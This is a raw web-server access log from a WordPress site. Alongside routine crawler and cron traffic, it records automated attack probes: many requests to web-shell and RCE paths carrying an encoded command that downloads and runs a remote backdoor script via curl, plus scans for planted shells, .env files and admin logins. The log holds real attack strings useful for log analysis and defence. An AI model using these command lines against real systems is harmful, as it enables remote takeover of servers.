216.244.66.226 - - [28/May/2025:20:05:22 -0400] "GET /robots.txt HTTP/1.1" 302 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.226 - - [28/May/2025:20:05:26 -0400] "GET /?redirect_to=https%3A%2F%2Fclient.socialdigiinnovator.com%2Frobots.txt HTTP/1.1" 200 9192 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.35 - - [28/May/2025:20:03:41 -0400] "POST /wp-cron.php?doing_wp_cron=1748477020.8061480522155761718750 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
49.51.52.250 - - [28/May/2025:20:03:44 -0400] "GET /password-reset/ HTTP/1.1" 200 9201 "https://client.socialdigiinnovator.com/?p=158" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.35 - - [28/May/2025:20:05:25 -0400] "POST /wp-cron.php?doing_wp_cron=1748477125.6174690723419189453125 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
43.155.140.157 - - [28/May/2025:20:15:47 -0400] "GET / HTTP/1.1" 200 9186 "https://client.socialdigiinnovator.com/embed/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.35 - - [28/May/2025:20:15:44 -0400] "POST /wp-cron.php?doing_wp_cron=1748477744.2555460929870605468750 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
43.155.140.157 - - [28/May/2025:20:15:41 -0400] "GET /embed/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.73.200 - - [28/May/2025:20:26:08 -0400] "GET /wp-content/uploads/2022/04/Form-logo-crop.webp HTTP/1.1" 200 37274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.35 - - [28/May/2025:20:45:38 -0400] "POST /wp-cron.php?doing_wp_cron=1748479537.5194149017333984375000 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
49.51.245.241 - - [28/May/2025:20:45:32 -0400] "GET /wp-json/oembed/1.0/embed?url=https%3A%2F%2Fclient.socialdigiinnovator.com%2Fpassword-reset%2F&format=xml HTTP/1.1" 200 1055 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.35 - - [28/May/2025:20:33:04 -0400] "POST /wp-cron.php?doing_wp_cron=1748478784.7265090942382812500000 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
49.51.52.250 - - [28/May/2025:20:33:01 -0400] "GET /wp-json/oembed/1.0/embed?url=https%3A%2F%2Fclient.socialdigiinnovator.com%2Fregister%2F HTTP/1.1" 200 2157 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.35 - - [28/May/2025:20:53:58 -0400] "POST /wp-cron.php?doing_wp_cron=1748480038.1336820125579833984375 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
170.106.165.186 - - [28/May/2025:20:53:52 -0400] "GET /password-reset/ HTTP/1.1" 200 9201 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.35 - - [28/May/2025:21:02:16 -0400] "POST /wp-cron.php?doing_wp_cron=1748480536.5184760093688964843750 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
198.54.114.35 - - [28/May/2025:21:04:16 -0400] "POST /wp-cron.php?doing_wp_cron=1748480656.5845029354095458984375 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
198.54.114.35 - - [28/May/2025:21:01:15 -0400] "POST /wp-cron.php?doing_wp_cron=1748480475.5689880847930908203125 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
198.54.114.35 - - [28/May/2025:21:01:04 -0400] "GET / HTTP/1.1" 200 9185 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0"
198.54.114.35 - - [28/May/2025:21:02:15 -0400] "GET / HTTP/1.1" 200 9189 "-" "Softaculous"
198.54.114.35 - - [28/May/2025:21:02:17 -0400] "GET / HTTP/1.1" 200 9189 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0"
43.135.138.128 - - [28/May/2025:21:04:05 -0400] "GET /wp-json/oembed/1.0/embed?url=https%3A%2F%2Fclient.socialdigiinnovator.com%2Fpassword-reset%2F HTTP/1.1" 200 2187 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.35 - - [28/May/2025:21:15:58 -0400] "POST /wp-cron.php?doing_wp_cron=1748481358.5237529277801513671875 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
217.154.79.204 - - [28/May/2025:21:15:51 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
198.54.114.35 - - [28/May/2025:21:17:13 -0400] "POST /wp-cron.php?doing_wp_cron=1748481433.6120409965515136718750 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
206.189.93.183 - - [28/May/2025:21:17:15 -0400] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8475 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:17:25 -0400] "GET /cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:17:35 -0400] "GET /modules/mod_webshell/mod_webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:17:51 -0400] "GET /modules/drupal_rce/drupal_rce/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:17:54 -0400] "GET /modules/drupal_rce/drupal_rce/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:17:57 -0400] "GET /modules/ctools-8.x-3.4/ctools/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:02 -0400] "GET /modules/ctools-8.x-3.4/ctools/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:08 -0400] "GET /sites/all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8475 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:13 -0400] "GET /blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:23 -0400] "GET /moodle/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:31 -0400] "GET /aulavirtual/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:36 -0400] "GET /aulavirtual/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:40 -0400] "GET /campus/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:42 -0400] "GET /campus/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:44 -0400] "GET /campus/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8475 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:47 -0400] "GET /campus/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:52 -0400] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
217.154.79.204 - - [28/May/2025:21:15:50 -0400] "GET /.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
206.189.93.183 - - [28/May/2025:21:17:09 -0400] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:17:18 -0400] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:17:22 -0400] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:17:26 -0400] "GET /cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:17:29 -0400] "GET /exec.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:17:31 -0400] "GET /exec.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
198.54.114.35 - - [28/May/2025:21:17:36 -0400] "POST /wp-cron.php?doing_wp_cron=1748481456.2264540195465087890625 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
206.189.93.183 - - [28/May/2025:21:17:38 -0400] "GET /modules/mod_webshell/mod_webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:17:42 -0400] "GET /all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:17:47 -0400] "GET /all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:04 -0400] "GET /sites/all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:10 -0400] "GET /blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:16 -0400] "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:19 -0400] "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:26 -0400] "GET /moodle/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:28 -0400] "GET /aulavirtual/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
198.54.114.35 - - [28/May/2025:21:18:34 -0400] "POST /wp-cron.php?doing_wp_cron=1748481514.4412729740142822265625 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
206.189.93.183 - - [28/May/2025:21:18:33 -0400] "GET /aulavirtual/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:18:59 -0400] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:19:01 -0400] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
5.188.86.66 - - [28/May/2025:21:32:05 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "http://client.socialdigiinnovator.com/wp-login.php" "Mozilla/5.0 (Linux; U; Android 9; en-US; Pixel 3 XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.125 Mobile Safari/537.36"
206.189.93.183 - - [28/May/2025:21:18:57 -0400] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 8474 "-" "python-requests/2.32.3"
206.189.93.183 - - [28/May/2025:21:19:05 -0400] "GET /?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 302 771 "-" "python-requests/2.32.3"
198.54.114.35 - - [28/May/2025:21:32:10 -0400] "POST /wp-cron.php?doing_wp_cron=1748482330.3993880748748779296875 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
5.188.86.66 - - [28/May/2025:21:32:08 -0400] "GET /404 HTTP/1.1" 404 8475 "https://client.socialdigiinnovator.com/wp-login.php" "Mozilla/5.0 (Linux; U; Android 9; en-US; Pixel 3 XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.125 Mobile Safari/537.36"
198.54.114.35 - - [28/May/2025:21:48:07 -0400] "POST /wp-cron.php?doing_wp_cron=1748483287.2930378913879394531250 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
54.215.86.26 - - [28/May/2025:21:48:00 -0400] "GET / HTTP/1.1" 200 9189 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
198.54.114.35 - - [28/May/2025:22:07:12 -0400] "POST /wp-cron.php?doing_wp_cron=1748484431.9837920665740966796875 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
52.164.213.105 - - [28/May/2025:22:07:17 -0400] "GET /01.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:18 -0400] "GET /02.php HTTP/1.1" 404 8474 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:19 -0400] "GET /mini.php HTTP/1.1" 404 8474 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:19 -0400] "GET /403.php HTTP/1.1" 404 8474 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:20 -0400] "GET /wso.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:21 -0400] "GET /1index.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:22 -0400] "GET /marijuana.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:23 -0400] "GET /crack_self_restore.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:25 -0400] "GET /menu.php HTTP/1.1" 404 8474 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:26 -0400] "GET /wp-apxupx.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:27 -0400] "GET /ova-tools.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:29 -0400] "GET /gallery HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:07 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:13 -0400] "GET /plugins.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:13 -0400] "GET /post.php HTTP/1.1" 404 8474 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:14 -0400] "GET /wp-2019.php HTTP/1.1" 404 8474 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:15 -0400] "GET /2index.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:15 -0400] "GET /C.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:16 -0400] "GET /c.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:21 -0400] "GET /wp-22.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:22 -0400] "GET /good.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:23 -0400] "GET /up.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:24 -0400] "GET /wp-admin/user/network.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:25 -0400] "GET /session.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:27 -0400] "GET /class.api.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:28 -0400] "GET /abe.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:29 -0400] "GET /htaccess.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:30 -0400] "GET /byp.php HTTP/1.1" 404 8475 "-" "-"
52.164.213.105 - - [28/May/2025:22:07:30 -0400] "GET /click.php HTTP/1.1" 404 8475 "-" "-"
196.251.86.133 - - [28/May/2025:22:40:04 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
196.251.86.133 - - [28/May/2025:22:40:04 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 200 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.86.133 - - [28/May/2025:22:40:04 -0400] "GET /ejihiuye.php?Fox=d3wL7 HTTP/1.1" 200 0 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.35 - - [28/May/2025:22:40:17 -0400] "POST /wp-cron.php?doing_wp_cron=1748486416.6943299770355224609375 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
196.251.86.133 - - [28/May/2025:22:40:12 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 200 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.86.133 - - [28/May/2025:22:40:04 -0400] "POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 404 8474 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.86.133 - - [28/May/2025:22:40:21 -0400] "GET / HTTP/1.1" 200 9191 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.86.133 - - [28/May/2025:22:40:21 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 404 8475 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.86.133 - - [28/May/2025:22:40:24 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 404 8474 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.86.133 - - [28/May/2025:22:40:27 -0400] "GET /wp-content/plugins/apikey/apikey.php.suspected?test=hello HTTP/1.1" 404 8475 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.86.133 - - [28/May/2025:22:40:27 -0400] "GET /plugins/content/apismtp/apismtp.php.suspected?test=hello HTTP/1.1" 404 8474 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.86.133 - - [28/May/2025:22:40:04 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.86.133 - - [28/May/2025:22:40:12 -0400] "GET / HTTP/1.1" 200 9190 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.86.133 - - [28/May/2025:22:40:12 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
196.251.86.133 - - [28/May/2025:22:40:12 -0400] "GET /ejihiuye.php?Fox=d3wL7 HTTP/1.1" 404 8475 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.86.133 - - [28/May/2025:22:40:20 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 8475 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
196.251.86.133 - - [28/May/2025:22:40:21 -0400] "POST /alfacgiapi/perl.alfa HTTP/1.1" 404 8475 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.86.133 - - [28/May/2025:22:40:24 -0400] "GET /wp-content/plugins/apikey/apikey.php?test=hello HTTP/1.1" 404 8475 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.86.133 - - [28/May/2025:22:40:25 -0400] "GET /plugins/content/apismtp/apismtp.php?test=hello HTTP/1.1" 404 8475 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.35 - - [28/May/2025:23:06:10 -0400] "POST /wp-cron.php?doing_wp_cron=1748487970.1811320781707763671875 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
146.70.197.170 - - [28/May/2025:23:06:11 -0400] "GET /wp-admin/ HTTP/1.1" 302 0 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.70.197.170 - - [28/May/2025:23:06:13 -0400] "GET /404 HTTP/1.1" 404 8474 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.70.197.170 - - [28/May/2025:23:06:06 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "https://client.socialdigiinnovator.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.70.197.170 - - [28/May/2025:23:06:08 -0400] "GET /404 HTTP/1.1" 404 8475 "https://client.socialdigiinnovator.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.70.197.170 - - [28/May/2025:23:06:13 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fclient.socialdigiinnovator.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 302 0 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
198.54.114.35 - - [29/May/2025:00:22:59 -0400] "POST /wp-cron.php?doing_wp_cron=1748492578.9981060028076171875000 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
141.98.252.185 - - [29/May/2025:00:22:53 -0400] "GET / HTTP/1.1" 200 9189 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36"
196.251.87.44 - - [29/May/2025:00:23:02 -0400] "GET /wp-admin/ HTTP/1.1" 302 0 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
